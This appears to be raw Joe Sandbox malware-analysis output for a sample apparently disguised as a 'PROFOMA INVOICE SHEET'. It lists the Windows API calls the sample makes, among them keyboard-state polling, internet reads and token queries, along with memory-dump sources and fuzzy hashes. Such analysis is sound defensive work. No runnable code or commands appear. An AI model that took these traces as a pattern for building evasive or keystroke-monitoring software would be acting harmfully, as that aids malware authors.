                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00396C33
                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00396C4A
                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00396C73
                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0037AB79,00000000,00000000), ref: 00396C98
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00396CC7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$Long$MessageSendShow
                                    • String ID:
                                    • API String ID: 3688381893-0
                                    • Opcode ID: e9def57d6b29ccdada8aa958dbc7d7e693f7e83260a03e393c77f611815f0334
                                    • Instruction ID: e3ba327179b3dd290fd815e165cd516475ef26541a84fd76ec7569e9a58d0692
                                    • Opcode Fuzzy Hash: e9def57d6b29ccdada8aa958dbc7d7e693f7e83260a03e393c77f611815f0334
                                    • Instruction Fuzzy Hash: 1E41D735605104AFDF26CF68CC56FB97BA9EB09350F160229F899A72E0D371ED41CE90
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 11872eb9e4e44bf6d2280c0065630830a020dd0f1b8aaaf3ac03a9787ce13d69
                                    • Instruction ID: fe3ac360da5f1eb330cffb46649903a9ca7180df5e50c294442f514f2c2f190a
                                    • Opcode Fuzzy Hash: 11872eb9e4e44bf6d2280c0065630830a020dd0f1b8aaaf3ac03a9787ce13d69
                                    • Instruction Fuzzy Hash: 23419032A00210AFCB26DF78C9C1A5AB7B5EF89714F1645A9E515EB351D631ED01CB90
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 00319141
                                    • ScreenToClient.USER32(00000000,?), ref: 0031915E
                                    • GetAsyncKeyState.USER32(00000001), ref: 00319183
                                    • GetAsyncKeyState.USER32(00000002), ref: 0031919D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: AsyncState$ClientCursorScreen
                                    • String ID:
                                    • API String ID: 4210589936-0
                                    • Opcode ID: e634294f341a8bb3b25a9cc20a0aefc98ec4bb680a03b62ee2e909ecdbea2789
                                    • Instruction ID: 4ece6d1f812f78e19d35fe93ef970b7fdf3950779f8f1e3f5c664eb5b75229a7
                                    • Opcode Fuzzy Hash: e634294f341a8bb3b25a9cc20a0aefc98ec4bb680a03b62ee2e909ecdbea2789
                                    • Instruction Fuzzy Hash: F041627190851ABBDF1A9F64D858BEEB774FB09320F214226E825A72E0C7306D94CF51
                                    APIs
                                    • GetInputState.USER32 ref: 003738CB
                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00373922
                                    • TranslateMessage.USER32(?), ref: 0037394B
                                    • DispatchMessageW.USER32(?), ref: 00373955
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00373966
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                    • String ID:
                                    • API String ID: 2256411358-0
                                    • Opcode ID: 3a75239fcd476a95168cb4a5042327e1f2f2235d9950c082cff8cc834929ce5e
                                    • Instruction ID: 60f35fa73069d436567a79660a52470a82876319508993de0699ad3a43f9b1cf
                                    • Opcode Fuzzy Hash: 3a75239fcd476a95168cb4a5042327e1f2f2235d9950c082cff8cc834929ce5e
                                    • Instruction Fuzzy Hash: 8431EB70515341BFEB37CB74E848BB677ECEB07300F05855ED56A82590D3B99684EB11
                                    APIs
                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0037C21E,00000000), ref: 0037CF38
                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 0037CF6F
                                    • GetLastError.KERNEL32(?,00000000,?,?,?,0037C21E,00000000), ref: 0037CFB4
                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,0037C21E,00000000), ref: 0037CFC8
                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,0037C21E,00000000), ref: 0037CFF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                    • String ID:
                                    • API String ID: 3191363074-0
                                    • Opcode ID: bc9c1998909f8f74d224103ae080de4ca65e7e9ebfa8c593ab21834bb4770028
                                    • Instruction ID: 9fa3ec7f78bc8a36f65b8d31f1869c339ebd260a4192ef04558f86583dbe372f
                                    • Opcode Fuzzy Hash: bc9c1998909f8f74d224103ae080de4ca65e7e9ebfa8c593ab21834bb4770028
                                    • Instruction Fuzzy Hash: C4317C71610205EFDB36DFA5D884AABBBFDEB04310B10942EF50AD2101DB34AE40DB60
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 00361915
                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 003619C1
                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 003619C9
                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 003619DA
                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 003619E2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessagePostSleep$RectWindow
                                    • String ID:
                                    • API String ID: 3382505437-0
                                    • Opcode ID: 3276086adec8afe6aa860ecc9525a77e7355aa3e312d8c7726f50984087bb6db
                                    • Instruction ID: dfd628bbb010f19541967cfeca5b58b864899e3c9ae917fafd7230b7f4001c5e
                                    • Opcode Fuzzy Hash: 3276086adec8afe6aa860ecc9525a77e7355aa3e312d8c7726f50984087bb6db
                                    • Instruction Fuzzy Hash: 2131C271A00219EFCB01CFA8CD99ADE7BB5EB04315F148225F921A72D1C7709D44CB90
                                    APIs
                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00395745
                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0039579D
                                    • _wcslen.LIBCMT ref: 003957AF
                                    • _wcslen.LIBCMT ref: 003957BA
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00395816
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$_wcslen
                                    • String ID:
                                    • API String ID: 763830540-0
                                    • Opcode ID: 36047ba6ae8185d88bc0f415cf5d26561bb2717bbf7a2f75f4f5e3e00b8b5bcb
                                    • Instruction ID: 4495026ba1a1d093043d0a1714357bbd94d69105c7bf86ca519c3a8bac11face
                                    • Opcode Fuzzy Hash: 36047ba6ae8185d88bc0f415cf5d26561bb2717bbf7a2f75f4f5e3e00b8b5bcb
                                    • Instruction Fuzzy Hash: 0A218271904618AADF239FA1DC85AEEB7BCFF04724F108216F929EA180D7708AC5CF50
                                    APIs
                                    • IsWindow.USER32(00000000), ref: 00380951
                                    • GetForegroundWindow.USER32 ref: 00380968
                                    • GetDC.USER32(00000000), ref: 003809A4
                                    • GetPixel.GDI32(00000000,?,00000003), ref: 003809B0
                                    • ReleaseDC.USER32(00000000,00000003), ref: 003809E8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$ForegroundPixelRelease
                                    • String ID:
                                    • API String ID: 4156661090-0
                                    • Opcode ID: b7d0f475026306f8962e54736f52d5901c0fa1714bba6883e800480a760df6ea
                                    • Instruction ID: 9b766a3d5be95dca8fb95becdcfcae2c7babd7e7df72a9bd04e2c2d213d96d8f
                                    • Opcode Fuzzy Hash: b7d0f475026306f8962e54736f52d5901c0fa1714bba6883e800480a760df6ea
                                    • Instruction Fuzzy Hash: 22219036610204AFD715EF69CC94AAEBBF9EF49700F048069F85ADB762DB30AC44CB50
                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 0033CDC6
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0033CDE9
                                      • Part of subcall function 00333820: RtlAllocateHeap.NTDLL(00000000,?,003D1444,?,0031FDF5,?,?,0030A976,00000010,003D1440,003013FC,?,003013C6,?,00301129), ref: 00333852
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0033CE0F
                                    • _free.LIBCMT ref: 0033CE22
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0033CE31
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                    • String ID:
                                    • API String ID: 336800556-0
                                    • Opcode ID: 036c1ac2ef932366fa9b57e3aea672486808d17c883e9ef768c5dac8f6c126e5
                                    • Instruction ID: a057ea88b8da195396100c09e4697a9510524e11867390e6302db4c80fab92ad
                                    • Opcode Fuzzy Hash: 036c1ac2ef932366fa9b57e3aea672486808d17c883e9ef768c5dac8f6c126e5
                                    • Instruction Fuzzy Hash: 6A01FC726112157F732326766CCCD7B796DDEC6BA2B15112AFD05E7101DA618D0183B0
                                    APIs
                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00319693
                                    • SelectObject.GDI32(?,00000000), ref: 003196A2
                                    • BeginPath.GDI32(?), ref: 003196B9
                                    • SelectObject.GDI32(?,00000000), ref: 003196E2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ObjectSelect$BeginCreatePath
                                    • String ID:
                                    • API String ID: 3225163088-0
                                    • Opcode ID: 1471ecf3aa44b84058cd1fb1303c77fe2cfaf436dbaa0ba2bf7327df305ea191
                                    • Instruction ID: 7b2df3f6d357ddd24d96a4b7f424592213908bd9849e6df1351305b64c6978ff
                                    • Opcode Fuzzy Hash: 1471ecf3aa44b84058cd1fb1303c77fe2cfaf436dbaa0ba2bf7327df305ea191
                                    • Instruction Fuzzy Hash: EF215771812305EBDB139F64EC28BE93BACBB04366F110217F810A61B1D3719895CBE4
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    • Opcode ID: fbc3317ed3754e9e2eaaacc5a112688ea04d2921a6f359147e2f9a6060100a45
                                    • Instruction ID: a60bf42dbf4ae4a022be5098cae3a616e690a9bccc2da421b597fca030fff330
                                    • Opcode Fuzzy Hash: fbc3317ed3754e9e2eaaacc5a112688ea04d2921a6f359147e2f9a6060100a45
                                    • Instruction Fuzzy Hash: B101B575641A19BFD70B9510AE82FFB735D9B313A4F008030FE04AE645F761ED2086E0
                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,0032F2DE,00333863,003D1444,?,0031FDF5,?,?,0030A976,00000010,003D1440,003013FC,?,003013C6), ref: 00332DFD
                                    • _free.LIBCMT ref: 00332E32
                                    • _free.LIBCMT ref: 00332E59
                                    • SetLastError.KERNEL32(00000000,00301129), ref: 00332E66
                                    • SetLastError.KERNEL32(00000000,00301129), ref: 00332E6F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID:
                                    • API String ID: 3170660625-0
                                    • Opcode ID: 472445ffec5152a25522e738b32820bdeea81553fea042362dde50902e18c655
                                    • Instruction ID: 153cdca951f4c9d3a91981c7a41d76d473ae12ee17e8af0fcb2e7936800b7014
                                    • Opcode Fuzzy Hash: 472445ffec5152a25522e738b32820bdeea81553fea042362dde50902e18c655
                                    • Instruction Fuzzy Hash: CE014C362456007BC6132779BCC7E2B265DAFC13B1F265429F425E62D2EF75CC015120
                                    APIs
                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0035FF41,80070057,?,?,?,0036035E), ref: 0036002B
                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0035FF41,80070057,?,?), ref: 00360046
                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0035FF41,80070057,?,?), ref: 00360054
                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0035FF41,80070057,?), ref: 00360064
                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0035FF41,80070057,?,?), ref: 00360070
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                    • String ID:
                                    • API String ID: 3897988419-0
                                    • Opcode ID: c4a8799b54389c71c619124fc58d20af107cee1460e7bff67f18b2adc4f85ca2
                                    • Instruction ID: a479f9844bddb7f53c7679b43a4abf380ab8c41936494fccaf0dddd297717868
                                    • Opcode Fuzzy Hash: c4a8799b54389c71c619124fc58d20af107cee1460e7bff67f18b2adc4f85ca2
                                    • Instruction Fuzzy Hash: 9901F972620204BFDB124F68DC09BAF7AEDEF48392F108025F805D2214EBB2CD008BA0
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?), ref: 0036E997
                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 0036E9A5
                                    • Sleep.KERNEL32(00000000), ref: 0036E9AD
                                    • QueryPerformanceCounter.KERNEL32(?), ref: 0036E9B7
                                    • Sleep.KERNEL32 ref: 0036E9F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                    • String ID:
                                    • API String ID: 2833360925-0
                                    • Opcode ID: e9c0ee2402e7061f32de649c5471daeac237b1cf8a4319429f85a1733ab97d31
                                    • Instruction ID: b81f3648a58d5b461cb01ae60e84547b8714976bb87f63f22dfc48c13e4da424
                                    • Opcode Fuzzy Hash: e9c0ee2402e7061f32de649c5471daeac237b1cf8a4319429f85a1733ab97d31
                                    • Instruction Fuzzy Hash: BB015735C1162DDBCF02AFE4D859AEEBBB8BF08700F014546E502B2248CB389558CBA5
                                    APIs
                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00361114
                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,00360B9B,?,?,?), ref: 00361120
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00360B9B,?,?,?), ref: 0036112F
                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00360B9B,?,?,?), ref: 00361136
                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0036114D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                    • String ID:
                                    • API String ID: 842720411-0
                                    • Opcode ID: 9afa7203e0296fce2d6604761dad8e250cbc36908a6d37db79d488d230f5aef9
                                    • Instruction ID: b032370db4ace575ba655fb99153d0457f1142a89694540e8e94330026231a79
                                    • Opcode Fuzzy Hash: 9afa7203e0296fce2d6604761dad8e250cbc36908a6d37db79d488d230f5aef9
                                    • Instruction Fuzzy Hash: AF013175110205BFDB124FA5DC49E6A3F6EEF86360F554416FA45D7360DB32DC00DA60
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00360FCA
                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00360FD6
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00360FE5
                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00360FEC
                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00361002
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                    • String ID:
                                    • API String ID: 44706859-0
                                    • Opcode ID: 4af6e348c339866689e728feb95a88abc442cd5a157c81d294b9ef5363157c2c
                                    • Instruction ID: c24b7396192b91de9326ed347030362b2ae7ea5de05cf9561ed86b49aa0fb5d0
                                    • Opcode Fuzzy Hash: 4af6e348c339866689e728feb95a88abc442cd5a157c81d294b9ef5363157c2c
                                    • Instruction Fuzzy Hash: C0F06D39210301EBDB225FA8DC8DF5A3BADEF89762F654416FA45C7261CA72DC408A70
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0036102A
                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00361036
                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00361045
                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0036104C
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00361062
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
